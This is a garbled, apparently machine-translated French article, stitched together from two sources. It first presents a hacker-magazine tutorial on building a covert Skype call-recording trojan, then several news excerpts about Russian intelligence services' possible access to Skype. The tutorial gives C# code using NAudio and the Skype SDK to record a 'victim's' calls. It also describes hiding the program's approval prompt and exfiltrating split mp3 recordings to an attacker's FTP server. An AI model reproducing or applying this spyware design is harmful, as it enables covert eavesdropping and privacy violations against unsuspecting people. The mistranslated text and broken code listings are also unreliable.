Est-il possible d'écouter sur Skype ? Les écoutes téléphoniques sont le meilleur programme d'espionnage. Skype est-il sécurisé ?

.
Si auparavant nous devions passer des heures dans des discussions textuelles, en tapant des kilo-octets
l'information, maintenant, grâce à la diffusion de l'Internet illimité jusqu'à
Dans l’arrière-pays russe, même les internautes les plus éloignés de la capitale peuvent apprendre
la joie de la communication vocale.

Méthodes d'interception

Nous avons décidé de l'objectif et nous devons maintenant lire la théorie ennuyeuse, sans laquelle
Il est impossible de progresser dans une telle affaire. Promenez-vous dans la rue, préparez-vous une tasse
vin chaud, installez-vous confortablement dans votre chaise et commencez à assimiler les connaissances sacrées.

Méthode n°1

Littéralement début octobre 2009, un artisan a écrit un renifleur avancé,
ce qui a été écrit dans toutes les ressources de sécurité World Wide Web. Si tu crois
news et l'auteur du sniff, il s'avère que pepper a réussi à intercepter le trafic Skype
(enfin, cela aurait pu être fait avant) et, surtout, le déchiffrer.

Je ne pouvais pas ignorer un tel événement, alors j'ai immédiatement décidé de trouver
source précieuse (l'auteur du renifleur a été sacrément gentil et a posté l'intégralité
Sorets), mais s'est mal cassé. Les ennemis du peuple ont retiré les précieuses sorcelleries du sujet
site, mais une marche forcée d'une heure sur Google n'a pas donné de résultats normaux. je viens de
Je suis tombé sur des variétés qui ne fonctionnent pas.

Complètement désespéré, j'ai abandonné cette option. Arrêt! Si tout le reste échoue, alors
Pourquoi je te dis tout ça ? C'est simple, la situation change chaque jour et
il est fort possible qu'au moment où l'article soit publié dans le vaste monde
Les variétés fonctionnelles de ce trio apparaîtront sur le web. Qu'est-ce que c'est que ça ? Gardez à l'esprit si
Si vous parvenez à trouver le précieux code source, considérez que vous avez tous les atouts entre vos mains et
Désormais, tous les skypers deviendront des cibles pour vous.

Méthode n°2

Sans aucun doute, la première méthode est la meilleure, mais la mise en œuvre est vraiment difficile.
Je vais être honnête : j’étais déjà désespéré et je voulais mettre un frein à toute cette entreprise, mais
le rédacteur en chef de la rubrique avait un avis différent. Après quelques indices, deux coups sur les reins et
foie, je ne pouvais pas refuser de préparer le matériel. Il s'avère que je ne l'ai pas fait
en vain.

Si vous ne pouvez pas atteindre l'objectif directement, vous devez alors vous approcher par l'arrière. Donc
Votre humble serviteur l’a fait aussi. L'idée est outrageusement simple et peut-être avez-vous déjà
J'ai même utilisé cette fonctionnalité pour une bonne cause.

Je ne vais pas tourner autour du pot, mais je dévoilerai toutes mes cartes. Alors, dans ma chaleur
Les systèmes d'exploitation préférés de Microsoft disposent d'une telle fonctionnalité : un mélangeur stéréo.
Peu de gens savent que grâce à cet animal errant et apparemment inutile
il est vraiment possible de créer un langage de programmation à part entière
espion Skype.

Activez le mixeur stéréo de votre système (ou pas vraiment votre ?), et vous
les deux flux sonores deviennent soumis au contrôle - celui qui va au microphone et
respectivement, celui qui va aux haut-parleurs/écouteurs. Pouvez-vous deviner quoi ?
est-ce que je m'en tire ? C'est vrai, pour capturer une conversation entre deux personnes sur Skype, il vous suffit de
vous devrez utiliser WinAPI/objects standard pour enregistrer l'audio à partir de
microphone.

C'est assez simple à faire et vous pouvez le vérifier en regardant
Encadré 1. J'y ai cité la partie responsable de l'enregistrement du son. Ne précipitez pas tout
réécrivez-le, il ne sera pas compilé tout de suite de toute façon.

Hélas, malgré toute la puissance et les possibilités illimitées du .NET Framework, il
Il n'existe absolument aucun outil pour enregistrer le son. Sans doute dans le futur
versions, cette lacune sera comblée, mais nous avons hâte !

De nombreux développeurs .NET souhaitent organiser les fonctionnalités de leurs applications
les enregistrements sonores utilisent des appels de fonctions API banals. Bonne option, mais
extrêmement gênant. J'ai emprunté un chemin légèrement différent et j'ai profité de ce que j'avais appris
Marc Heath.

Cet homme a fait un excellent travail et a créé le projet NAudio - un éditeur audio avec
open source. Dans le cadre du projet, Mark a écrit un cadre qui permet
interagir aussi facilement que possible avec diverses fonctions WinAPI pour travailler avec
son.

NAudio est disponible sur . Juste
ajoutez ses modules à votre projet et tous ceux nécessaires seront à votre disposition
cours. L'enregistrement du son avec leur aide est extrêmement simple. Oui, vous êtes probablement déjà intéressé
Je suis convaincu :).

Au tout début du listing, je définis le format de fichier WAV. Pour cela j'ai besoin
régler le nombre de canaux (dans notre cas nous écrirons en mono) et la fréquence
échantillon. En plus des paramètres de format de fichier audio, je dois déterminer le périphérique
(numéro d'appareil) à partir duquel nous capturerons le son. Je l'ai mis à 0, ce qui est
correspond à l’appareil d’enregistrement par défaut.

On peut connaître la prochaine portion de données reçues sur la carte son
Événement waveIn_DataAvaible(). Si cela a fonctionné, alors les données sont arrivées et
doit être enregistré.

Et voici les premiers inconvénients

Ne vous précipitez pas pour baver et essayez de créer rapidement des logiciels malveillants pour Skype.
La méthode que j'ai proposée est bonne et entièrement fonctionnelle, mais elle a
Il y a quelques inconvénients que vous devez connaître à l'avance. Certains d'entre eux :

1. Il n'y a aucune garantie que le système de l'utilisateur dispose d'un mixeur stéréo
sera actif. Oui, il est activé par défaut, mais de nombreux utilisateurs forcent
éteignez-le. Pour quoi? Personnellement, je dois le faire à cause de ce que j'écris.
podcasts et il est extrêmement important pour moi que le son soit capté uniquement par mon microphone, et
pas les voix du co-animateur.

Votre programme doit être préparé à cet état de choses et si quelque chose se produit
pouvoir effectuer vous-même les réglages nécessaires. C'est là que naissent les petits
complexité, mais est-ce que quelqu'un a dit que ce serait complètement simple ?

2. Il n’existe pas de point de référence clair sur lequel vous pouvez compter et assurez-vous à 100 % que
à ce moment-là, l'utilisateur a commencé à communiquer avec son interlocuteur. Sur l'un des
Pour résoudre ce problème, les forums de codage ont suggéré la méthode suivante :
analyser le son entrant dans le microphone et en cas de détection de gros
les sauts d'ondes sonores (c'est-à-dire lorsqu'une personne commence à crier/parler) commencent
enregistrements. Pour interrompre, vous devez suivre approximativement l'algorithme suivant :
On attend le silence et, s'il dure plus de n minutes, on arrête de capter le son.

L'algorithme proposé est sans doute bon, mais sous la forme décrite ci-dessus il est meilleur
ne pas utiliser. Je vais essayer d'expliquer pourquoi. Zayuzav cette méthode V forme pure,
vous risquez de tomber sur un grand nombre de faux positifs. Si allumé
territoire ennemi, le microphone se trouve à proximité des haut-parleurs, d'où il sonne inlassablement
heavy metal, alors votre troy enregistrera constamment, et pendant la récolte
Vous constaterez que vous disposez d'une collection de tous les morceaux préférés de votre victime. Quoi
que faire alors ? Espérer une chance et tout écrire ? C'est possible, mais d'une manière ou d'une autre, ce n'est pas le cas
dans le style des hackers.

J'ai fait un petit brainstorming et je suis arrivé à la conclusion que ce qui précède
Vous pouvez utiliser cette méthode, mais uniquement en souscrivant au préalable une assurance.
L'assurance peut être d'au moins deux types :

1. Crochets. Dans notre magazine, nous avons décrit à plusieurs reprises la technique d'utilisation des crochets,
et encore une fois décris tous les détails et, en plus, donne des exemples, moi
s'interrompt beaucoup. Vous n'êtes plus petit et vous devriez savoir de telles choses :). je viens de
Je vais suggérer un algorithme :

un. Nous définissons un hook pour gérer la création de nouvelles fenêtres.

b. Nous implémentons une vérification dans laquelle nous traitons chaque fenêtre nouvellement créée. DANS
Dans le code de vérification, nous devons regarder : le parent de la fenêtre, la classe de la fenêtre, le titre, etc.
A ces signes on peut reconnaître une fenêtre appel Skype entrant et au cas où
où commencer l'enregistrement.

2. Fonctions pour travailler avec Windows. La deuxième solution au problème serait la bonne
fonctions WinAPI familières pour travailler avec Windows. Vous en souvenez-vous encore ?
des mots comme FindWindow, EnumWindows, EnumChildWindows, etc. ? Utiliser ces API
une recherche de fenêtre banale est implémentée appel entrant. Si la fenêtre est trouvée, alors ceci
signifie que la victime a commencé à discuter sur Skype, sinon vous devez
chercher un peu plus tard. La fréquence de recherche doit être minimale,
sinon vous risquez de manquer des appels secrets.

Méthode n°3

Et ainsi, lentement mais sûrement, nous sommes parvenus au moyen le plus simple et le plus pratique.
enregistrements de conversations Skype. Peu de gens savent que les développeurs Skype encouragent les gens
ceux qui veulent développer toutes sortes de choses utiles pour leur idée. L'encouragement lui-même
exprimé dans le développement et la mise à jour du SDK officiel.

Sur la base des composants inclus dans le SDK, les programmeurs peuvent créer des modules complémentaires ou
juste des applications basées sur Skype. Comme l'un des goodies de cet ensemble
Vous pouvez souligner la présence d'exemples pour divers langages de programmation populaires.
Ici, vous n'oublierez pas C++, C# et même le grand et puissant Delphi (d'ailleurs, tout n'est pas
bien sûr, mais Skype lui-même est écrit en Delphi). Bref, ce SDK est le paradis pour
programmeurs qui ont décidé de bricoler Skype.

Pour vous et moi, le SDK est encore plus cool que le paradis. Sur la base de ce cadre, nous
nous pouvons non seulement enregistrer la communication vocale de l'utilisateur, mais également l'intercepter
SMS reçus et envoyés par lui, fichiers, passer un appel de sa part
nom, etc

Mais n’allons pas devancer la locomotive en louant ce que nous avons déjà essayé, mais
Faisons connaissance avec toutes les nuances à l'aide d'un exemple.

Accédez à notre DVD et installez le SDK. L'installation ne devrait pas être difficile.
Exécutez simplement le fichier à partir du dossier SDK et acceptez tout ce qui vous est demandé.
Après avoir terminé l'installation, lancez Visual Studio (j'ai utilisé la version 2008) et
créer un nouveau projet. Sélectionnez le modèle SEHEwc comme type de projet.

Pendant que vous créez votre projet, je parlerai brièvement du modèle SEHEwc. En vérité
parlant, ce n’est pas exactement un modèle au sens habituel du terme. Dans la vraie vie, c'est un programme à part entière
un exemple démontrant toutes les capacités du SDK dont j'ai fait l'éloge. La démo a été très bien écrite
bon et comprendre son code est un plaisir.

Avant de plonger dans le code, démarrez votre Skype et lancez le projet créé (je
Parlons maintenant du modèle). Lorsque le code source est exécuté, votre Skype rapportera fidèlement,
que telle ou telle application tente d'accéder à ses fonctions. allez-y et
essayez d'envoyer un message texte via Skype. Avant d'avoir le temps de le virer,
Tout le texte envoyé apparaîtra dans le champ de texte. Cela signifie que
La démo s'exécute avec succès.

La puissance de l’exemple ne fait aucun doute. À première vue, il peut sembler que
son code apporte des réponses aux questions de programmation les plus sophistiquées
Skype. Mais la fonctionnalité la plus importante pour nous est l'enregistrement des conversations, qui, hélas, n'inclut pas
mis en œuvre. Eh bien, nous allons corriger la situation.

Accédez à l’éditeur de code et recherchez la description de la méthode OurCallStatus. Dans son corps
Décrit l'obtention de diverses informations sur l'appel en cours. Tout est bon et fou
intéressant, mais nous voulons autre chose. Effacez le code existant et réécrivez-le à la place
Contenu de la troisième boîte. Pendant que vous réécrivez, je vais vous dire quoi
qui se passe là-bas.

Dans la toute première ligne, je vérifie et compare la valeur de la variable
status avec la valeur clsInProgress de l'énumération TCallStatus (euh,
lettre de dauphin nostalgique T avant le nom du type :)). S'ils sont égaux, alors
La conversation bat son plein et il est temps de commencer à enregistrer le son.

Maintenant, préparez-vous et ne tombez pas de votre chaise lorsque vous découvrez que l'enregistrement
fait avec une seule ligne:

call.set_CaptureMicDevice(TCallIoDeviceType.callIoDeviceTypeFile,
@"Chemin où enregistrer" + call.Id.ToString() + ".wav");

Le premier paramètre de la méthode set_captureMicDevice nécessite de transmettre le périphérique
vers lequel le flux du microphone sera émis. Les types d'appareils sont stockés dans
énumération TCallIoDeviceType. Nous voulons capturer le son dans un fichier, nous définissons donc
callIoDeviceTypeFile. Le deuxième paramètre dépend du premier. Dans notre cas, c'est
le chemin d'accès au fichier dans lequel nous sauvegarderons le résultat de l'enregistrement est transmis.

Veuillez noter qu'en appelant la méthode set_captureMicDevice, nous sauvegarderons uniquement
la voix de notre victime, et ceux avec qui elle parle resteront dans les coulisses. Enregistrer
Nous serons des interlocuteurs utilisant la méthode set_OutputDevice :

call.set_OutputDevice(TCallIoDeviceType.callIoDeviceTypeFile, @"Chemin
où enregistrer" + call.Id.ToString() + ".wav");

Ses paramètres sont exactement les mêmes que le précédent, donc deux fois
Je ne vous le dirai pas :).

On peut dire que tout est prêt. Compilez et lancez le projet. Au démarrage
Oubliez d’approuver l’injection sur Skype, sinon vous ne pourrez rien capturer.

Essayons de tester notre application en conditions réelles. Demandez le vôtre
un ami pour vous appeler sur Skype et discuter un peu avec vous.

Si vous avez été extrêmement prudent lors de la réécriture de la liste, alors selon ceux transférés à
Les méthodes captureMicDevice et set_OutputDevice pour enregistrer les fichiers seront
posez des WAV fraîchement sortis du four. Écoutez-les sur votre lecteur et assurez-vous que tout
fonctionne comme il se doit.

L'utilisation du SDK est extrêmement simple (surtout si vous écrivez sous .NET) et son
les opportunités seront certainement demandées lors du développement professionnel
enregistreur Skype.

Je ne vous dirai pas comment intercepter les messages texte et
d'autres informations utiles. Tout cela se fait en appelant quelques méthodes qui
documenté en détail. Les documents (en anglais bien sûr) sont toujours disponibles sur
portail officiel :

https://developer.skype.com/Docs/Skype4COMLib. Si vous rencontrez des problèmes
avec l'anglais, alors ne vous inquiétez pas. Regardez simplement le code du modèle d’application. Pense,
vous comprendrez. En dernier recours, écrivez-moi.

Des restrictions ennuyeuses

Le SDK officiel présente un inconvénient extrêmement important. Lorsque vous démarrez votre
L'application Skype sonnera constamment l'alarme. Vous comprenez vous-même si la victime voit
une fenêtre étrange avec la question : « dois-je autoriser l'accès à cette application ? », puis avec
Il y a 99,9 % de chances qu’elle appuie sur le bouton « Non » et vous serez laissé pour compte. À
cela ne s'est pas produit, je vous recommande de créer deux programmes - l'un sera
est axé sur la capture sonore et écrit en C# pratique, et le second est le sien
une sorte de chargeur de démarrage. Son objectif principal sera de rester inaperçu dans le système,
masquer/cliquer sur les boutons des fenêtres inutiles (il s'agit de la fenêtre d'approbation de lancement). Sauf
De plus, grâce à ce même prog-loader, il sera possible d'implémenter toutes les fonctions
télécommande, etc En général, vous voyez l'idée.

Comment gérer les fenêtres « inutiles » ?

Dans les deuxième et troisième méthodes de capture des conversations Skype, nous avons rencontré un problème
- interaction avec les fenêtres d'une autre application. J'ai dit ça à propos de travailler avec des inconnus
nous avons parlé plusieurs fois des fenêtres dans notre magazine (je recommande un article sur le vol
portefeuilles d'argent en ligne, publiés il y a 3-4 ans), mais si vous venez de rejoindre
notre fête et tu ne sais pas quoi et comment, ne sois pas paresseux, va sur bing.com et regarde là-bas
concernant les fonctions FindWindow, GetWindowText, PostMessage. Moteur de recherche de petits articles textiles
vous mènera immédiatement à rubrique obligatoire MSDN et vous pouvez rapidement
Apprenez à connaître ces fonctionnalités utiles.

Sortie de fichier

Tôt ou tard, vous serez confronté à un autre gros problème : la récolte.
C’est bien de sauvegarder avec précision tous les bavardages de la victime, bien sûr, mais à quoi ça sert
biens pillés s’ils ne peuvent pas être collectés et analysés ? Droite,
aucun.

Spy for Skype n'est pas un enregistreur de frappe et ses journaux ne peuvent pas être facilement envoyés par courrier
vous enverrez. Non seulement les fichiers contenant du son pèsent brutalement, mais ils doivent également être transférés
Leur protocole SMTP n'est pas du tout cool.

La tâche de sortie des fichiers devient plusieurs fois plus compliquée si l'utilisateur n'est pas assis dessus
illimité (oui, ceux-ci existent toujours). Dans ce cas, l'envoi de gros
le volume de dossiers ne passera pas inaperçu dans les statistiques et c'est obligatoire
alertera un utilisateur avancé. Surtout quand il éprouve
gros ralentissements en ligne.

Après avoir réfléchi un peu, j'ai trouvé l'algorithme suivant :

  1. Encodage de chaque fichier audio au format mp3. Initialement, toutes les conversations
    Nous avons écrit à notre victime en WAV, qui pèsent beaucoup. Par exemple, la moyenne
    la taille d'une longue conversation (environ une heure) peut atteindre 50 à 80 mètres (en
    selon les réglages). Envoi d'un tel fichier dans sa forme pure, c'est un euphémisme,
    irréaliste. La conversion au format mp3 résoudra partiellement le problème de taille. Si
    exposer degré maximum compression et débit binaire minimum, alors la taille fonctionnera
    réduire de 3 à 4 fois. C'est mieux, mais pas parfait. Sortie du même 5 mètres
    peut paraître difficile.
  2. Diviser un fichier en parties plus petites. Dans le paragraphe précédent, j'ai dit que
    même une opération telle que l'encodage d'un fichier en mp3 ne vous évitera pas de problèmes avec
    expéditeur. Il vaut mieux rompre fichier compressé en morceaux plus petits et envoyer
    déjà eux. Par exemple, divisez un mp3 en morceaux de 300 à 500 Ko. De si petites choses
    il sera beaucoup plus facile et plus rapide de le retirer du champ de bataille.

Je pense avoir tout dit sur la préparation des fichiers à envoyer. Passons rapidement en revue
méthode d'expédition. Quelques paragraphes plus haut, j'ai déclaré qu'envoyer de telles choses
via smtp ce n’est pas très correct, et c’est tout simplement problématique. Où est-il préférable d'utiliser
ce bon vieux ftp, qui a fait ses preuves au fil des années ! Intégrez dans votre application .NET
un simple client FTP - quoi de plus simple ? Jetez un œil à la barre latérale et voyez par vous-même.

Fin heureuse

Il n’y a aucune limite aux capacités humaines ni à la perfection. Insoluble
Il n’y a aucun problème et toutes les difficultés peuvent être surmontées. Aujourd'hui, je vous ai parlé
la structure squelettique de l'enregistreur vocal, et le choix ultérieur ne dépend que de vous. Ou
vous rassemblerez toutes les informations que vous recevez dans une seule pile et créerez un espion insaisissable pour
Skype, ou vous développerez un outil professionnel de sauvegarde légale
négociations :). Le choix vous appartient, tout ce que je peux faire c'est vous dire au revoir et vous souhaiter
Bonne chance!

P.S. Ne demandez pas le code source complet de mon cheval de Troie. Je ne le donnerai pas de toute façon, je suis gourmand :). UN
sérieusement, je ne supporte pas ce genre de choses et je ne veux pas que beaucoup de gens compilent bêtement
projet terminé et début des hostilités. Les écoutes téléphoniques sont
une atteinte à la vie privée, et cela, en plus d'être illégal, est aussi ignoble ! À bientôt!

Avertissement

Écouter les conversations des autres est profondément illégal. Utiliser
les informations reçues uniquement pour créer une sauvegarde de vos conversations !

Encadré 1. Enregistrement du son

//Préparation de l'enregistrement
waveIn = new WaveIn();
waveIn.DeviceNumber = 0 ;
waveIn.DataAvailable += waveIn_DataAvailable ;
int taux d'échantillonnage = 8 000 ;
canaux int = 1 ;

waveIn.WaveFormat = new WaveFormat(sampleRate, canaux);
waveIn.StartRecording();

void waveIn_DataAvailable (expéditeur de l'objet, WaveInEventArgs e)
{
si (recordingState == RecordingState.Recording)
écrivain.WriteData(e.Buffer, 0, e.BytesRecorded);

Encadré 2. Enregistrement des appels entrants dans un fichier

essayer
{
// Enregistre un appel entrant
si (statut == TCallStatus.clsInProgress)
{
// Capturez le son et enregistrez-le dans
//fichier (thread utilisateur)
call.set_CaptureMicDevice(

@"C:\temp\sound_user" + call.Id.ToString() +
".wav");

// Capturez le son et enregistrez-le
//dans le fichier (tous les autres interlocuteurs
call.set_OutputDevice(
TCallIoDeviceType.callIoDeviceTypeFile,
@"C:\temp\sound_people" + call.Id.ToString() +
".wav");

}
}
attraper (exception e)
{
//Afficher les erreurs
AddTextToTextBox1(DateTime.Now.ToLocalTime() + ": " +
" Notre code - Impossible de capturer l'audio : " + call.Id.ToString() +
" – Source de l'erreur : " + e.Source + " – Texte de l'erreur : " + e.Message +
"\r\n");

Encadré 3. Client FTP utilisant une classe basée sur la classe FTP Dot .NET

essayer
{
Connexion Ftp maConnexionFtp =
new FTPConnection();
myFtpConnection.MessageReceived +=
nouveau FtpConnectionEventHandler (connection_MessageReceived);

maConnexionFtp.Hôte =
"ftp://monserveurftp" ;
myFtpConnection.UserName =
"nom d'utilisateur";
maConnexionFtp.Mot de passe =
"mot de passe";
myFtpConnection.RemoteDirectory =
"/temp/testforxakep";
myFtpConnection.Upload (@"C:\temp\sound.part1.mp3",
"son.part1.mp3");
}

attraper (WebException ex)
{

}
attraper (Exception ex)
{
Console.WriteLine(ex.ToString());
}

void connection_MessageReceived (expéditeur de l'objet,
FTPConnectionEventArgse)
{
Console.WriteLine(e.Message);

Vedomosti a rapporté cette nouvelle hier, citant plusieurs acteurs du marché. En quelques années, selon les experts, le secret devient clair dans le service, auparavant considéré comme le plus fiable en termes de sécurité. De plus, en plus des conversations, la localisation des utilisateurs serait enregistrée.

Dans la soirée, un commentaire a été reçu de Microsoft (qui possède désormais Skype) - oui, la société a en fait un accord avec les services de renseignement pour fournir le code source du logiciel, sinon il serait impossible d'utiliser les programmes dans les agences gouvernementales russes. . Mais fournir des codes ne signifie pas que les agents du renseignement lisent la correspondance des utilisateurs ou accèdent aux données des utilisateurs. Connaissant l’algorithme de chiffrement, mais ne disposant pas de la clé, il est impossible d’intercepter le message ; la clé est créée du côté de l’utilisateur.

Nous avons discuté avec Matvey Alekseev, directeur exécutif de la Fondation pour l'aide au développement des technologies et de l'infrastructure Internet, de la question de savoir si l'internaute moyen devrait avoir peur des écoutes des agences de renseignement.

"Eh bien, pour être honnête, si vous disposez des clés de décryptage, tout est possible", a déclaré l'expert. "S'il y a trois ans, avant que Microsoft n'achète Skype, il n'y avait que des protocoles d'adressage, alors Microsoft a déjà tout sur le matériel." Et la technologie chinoise KeyLogger, comme en russe... en général, quelque chose comme la reconnaissance de mots, comme celle mise en œuvre avec les hashtags, peut permettre encore plus. Dans tous les cas, ne vous inquiétez pas, «l'écoute» sera très probablement réalisée dans le cadre du SORM (système d'activités d'enquête opérationnelles), et le pouvoir des services spéciaux ne pourra pas couvrir tout le trafic. à l’échelle mondiale. »

Les utilisateurs « ordinaires » ne seront pas mis sur écoute ?

Anton Razumov, responsable du groupe de conseil en sécurité chez Check Point Software Technologies, estime que l'éventuelle écoute clandestine des utilisateurs de Skype est nouvelle sur le marché. "Il y avait peut-être eu des soupçons auparavant, mais maintenant, bien que non officiels, c'est devenu une confirmation très proche de la vérité", explique l'expert. "Cependant, cela n'a que peu d'importance pour les utilisateurs ordinaires. Il n’y a pratiquement plus de sécurité sur Internet tel quel. Cela se voit par exemple clairement dans les résultats de recherche personnalisés et les statistiques fournies aux webmasters par les différents compteurs de visiteurs (sexe, âge des visiteurs). Les intérêts de l’utilisateur sont pris en compte en fonction des sites qu’il a consultés précédemment et des informations qu’il laisse sur les réseaux sociaux.

Selon Anton Razumov, les représentants des entreprises ne devraient pas avoir peur d'éventuelles « écoutes téléphoniques », mais seulement s'il s'agit de services de renseignement étrangers. «Une autre chose est la disponibilité de ces informations pour les services de renseignement russes et la question de la confiance en eux, la crainte de la possibilité d'utiliser ces informations sans décision de justice dans l'intérêt de la concurrence.

Techniquement, cela semble tout à fait réaliste, en est sûr l'expert, d'autant plus qu'après l'acquisition de Skype, Microsoft a commencé à modifier l'architecture de ce produit. Auparavant, un modèle distribué était utilisé, lorsque le trafic passait directement d'un utilisateur à l'autre ; dans des cas extrêmes (par exemple, pour contourner les restrictions de traduction d'adresses dynamiques), des nœuds intermédiaires étaient utilisés (également des utilisateurs de Skype, mais avec une connexion Internet plus ouverte). ). Aujourd'hui, en effet, le rôle des serveurs est devenu plus important, ce qui facilite la résolution des tâches d'écoute du trafic.

En général, l’interception et l’analyse du trafic par les agences de renseignement sont un phénomène normal partout dans le monde. SORM et Echelon existent depuis de nombreuses années.

Tu peux toujours te cacher

Anton Razumov compare cette histoire à la capacité de déterminer l'itinéraire de son déplacement sur une certaine période de temps à l'aide d'un numéro de plaque d'immatriculation de voiture, grâce à la fusion des informations des caméras vidéo et d'un système de reconnaissance d'images.

« Je ne connais pas encore de systèmes capables de reconnaître et d’analyser à la volée mots-clés Le russe est parlé par tous les abonnés Skype parlant en même temps », dit l'expert en technologie, cité également par Matvey Alekseev. « Cependant, je pense qu'il est tout à fait possible de contrôler certains individus.

Quoi qu’il en soit, une approche globale à plusieurs niveaux devrait être appliquée à la sécurité. En particulier, les personnes qui soupçonnent que ce mécanisme pourrait leur nuire d’une manière ou d’une autre peuvent également utiliser des brouilleurs vocaux afin que Skype transmette des données pré-codées, cryptées avec des clés générées par des mécanismes complètement distincts.

Les écoutes téléphoniques de Skype comme outil de lutte contre la criminalité

« Offrir aux services de renseignement russes la possibilité d’écouter Skype est une pratique mondiale bien établie », j’en suis sûr. Daria Abramova, directrice de la communication marketing, Orange Business Services, - Les États-Unis et la Chine le font depuis longtemps et le considèrent comme un outil de lutte contre la criminalité. La France va dans la même direction.

On ne peut guère affirmer qu’il soit possible de maintenir une confidentialité absolue sur Internet. Il n’est pas étonnant que les organisations utilisent un service de réseau privé virtuel (VPN) sécurisé fourni par des fournisseurs certifiés pour transmettre des informations commerciales. De tels outils contribueront à protéger contre les machinations des concurrents et des attaquants, mais nous devons comprendre que les services de renseignement auront de toute façon accès aux informations dont ils ont besoin.»

Les éventuelles écoutes téléphoniques de Skype par les services de renseignement ne sont pas une nouveauté pour Alexandra Vlasov, chef du département TIC chez T-systems CIS. « Microsoft a acquis Skype, entre autres, dans le but d'obtenir la possibilité de « mettre sur écoute », estime-t-il. « Il serait naïf de croire qu'un service aussi populaire restera longtemps sans l'attention des forces de l'ordre. Auparavant, Skype était vraiment un « dur à cuire » pour les services de renseignement, mais après l'avoir acheté, les Américains ont définitivement une affinité pour lui. accès complet. Il est difficile de dire exactement ce que Skype et Microsoft ont révélé aux forces de sécurité russes.

Techniquement, les « écoutes téléphoniques » peuvent être effectuées à l’aide du système SORM, installé dans tous les centres de communication. Et si vous considérez qu'avec une seule connexion, vous pouvez vous connecter à Skype à partir de plusieurs ordinateurs à la fois, rien ne garantit que Skype ne dispose d'aucun mot de passe technique pour se connecter à un compte.

Il n'y a pratiquement aucun endroit sur Internet où la main des forces de l'ordre n'a pas atteint. Il n'y a aucun danger pour les citoyens qui respectent le code criminel. À mon avis, le moyen le plus efficace de se cacher est de se perdre dans le flux croissant d’informations.

Jusqu'à récemment, chacun pouvait être sûr que lorsqu'il communiquait avec son interlocuteur via Skype, Confidentialité de la conversation sera respecté. Cependant, après que Microsoft a acquis les droits sur ce programme, la technologie y a été intégrée. interception légale pour les services spéciaux. Depuis quelques années, le FSB et le ministère de l'Intérieur en ont la possibilité, parfois même sans décision de justice.

Cette innovation de Microsoft ne représente aucune menace pour les citoyens respectueux de la loi, car il est peu probable que les conversations quotidiennes intéressent les forces de sécurité gouvernementales. Mais pour les citoyens ayant des sentiments extrémistes ou des structures criminelles, cela peut créer des problèmes. Le fait est que la technologie peut déterminer non seulement le contenu d'une conversation, mais même la localisation des interlocuteurs.

Alors que les gens ordinaires étaient indifférents à cette nouvelle, les directions des grandes entreprises se méfiaient de cette innovation. Dans certaines entreprises, il était interdit aux salariés de communiquer entre eux via Skype sur des sujets liés au travail. Les propriétaires des structures d'entreprise peuvent être compris. Si pour informations confidentielles Les services de renseignement de l’État peuvent y accéder, mais la possibilité que les services de renseignement d’entreprise y accèdent ne peut être exclue. À ce jour, l’espionnage industriel n’a pas été aboli, ce qui justifie la méfiance des entreprises.

Autres matériaux :


Les messageries instantanées modernes font désormais partie de nos vies. Les programmes de messagerie instantanée nous aident au travail, dans notre vie personnelle et lorsque nous communiquons avec les enfants. Considérons une autre façon d'utiliser les messagers pour les enregistrer en vue d'un traitement et d'une analyse ultérieurs des activités des employés, des enfants ou des conjoints de l'entreprise.


Les technologies Skype sont la propriété de la société de télécommunications Microsoft, dont le siège social est situé au Luxembourg. Le logiciel du programme est sous licence. Skype transmet messages vocaux sur IP (VoIP). Logiciel pour la première fois...


Contrairement à la communication des canaux du réseau téléphonique, la téléphonie IP est moins fiable, car cela ne garantit pas les performances mécanismes de réseau. Ceux. Pendant le fonctionnement du système, les paquets de données peuvent simplement être perdus ou être transmis à l'utilisateur final dans le mauvais ordre.


Skype est un programme qui fournit un cryptage discours vocal via des sessions multimédia sur protocole Internet (IP) et fournit des services d'appel (payants) vers des lignes fixes ou téléphones portables. Le logiciel a été développé par Technologies S.A. Ce programme favorise la distribution d'appels vocaux via...


La communication via Skype est populaire dans les milieux d'affaires. Il est indispensable pour organiser des conférences et des réunions lorsqu'il n'est pas possible d'y assister en personne. Dans tous les cas, avoir la compétence d’une telle communication ne sera qu’un plus pour vous.


Le programme d'enregistrement Skype a fait un excellent travail en créant un clip de la réunion des anciens élèves lors d'une conférence Skype.


Actuellement, de plus en plus de contacts sur Internet se font via Skype. Afin d'enregistrer avec précision et efficacité les conversations Skype, nous aurons besoin programme spécial. Le programme d'enregistrement Skype, VoiceSpy, est parfait à ces fins.


Skype sera-t-il surveillé par le FSB et d'autres agences de renseignement ? Pour l’heure, Skype reste une « boîte noire » pour tous, inaccessible à toute interception en dehors de l’ordinateur.

En préface de l'article, je voudrais souligner - il y a quelques années, lorsque Microsoft a acheté Skype, les médias russes ont soulevé la question de la possibilité de fuites et de violation de la confidentialité des conversations et des chats dans Skype. Jusqu'à présent, tout le monde connaissait la position plutôt stricte du développeur Skype concernant la sécurité de ses clients. La défense des intérêts des clients auprès des services de renseignement a contraint ces derniers à empêcher la diffusion généralisée des technologies de voix sur IP présentant un niveau de protection suffisant. L'achat de la technologie Microsoft a permis aux forces de l'ordre de dicter leurs conditions à l'entreprise - comme on le sait, pour une utilisation dans systèmes d'information avec des données personnelles et autres données secrètes, une distribution Windows FSTEC « vérifiée » est requise.

Les services de renseignement russes ont la possibilité de surveiller les conversations sur Skype, ont déclaré à Vedomosti plusieurs acteurs du marché. sécurité des informations. Le PDG du Groupe-IB, Ilya Sachkov, affirme que les services de renseignement sont capables non seulement d'écouter, mais aussi de déterminer la localisation d'un utilisateur de Skype « depuis quelques années maintenant ». "C'est pourquoi il est interdit aux employés de notre entreprise, par exemple, de communiquer sur des sujets professionnels sur Skype", explique Sachkov.

Après l'acquisition de Skype par Microsoft en mai 2011, Microsoft a fourni au client Skype une technologie d'écoute légale, explique Maxim Emm, directeur exécutif de Peak Systems. Désormais, tout abonné peut passer à un mode spécial dans lequel les clés de cryptage, précédemment générées sur l'ordinateur de l'abonné, seront générées sur le serveur.


Après avoir accédé au serveur, vous pouvez écouter la conversation ou lire la correspondance. Microsoft offre la possibilité d'utiliser cette technologie aux agences de renseignement du monde entier, y compris russes, explique l'expert. Selon deux spécialistes de la sécurité de l'information, les services de renseignement russes n'ont pas toujours accès à la correspondance et aux conversations Skype sur décision du tribunal - cela se produit parfois « simplement sur demande ». Il est impossible de considérer que les écoutes téléphoniques de Skype représentent un problème insurmontable pour les forces de l'ordre russes, confirme un responsable du ministère de l'Intérieur.

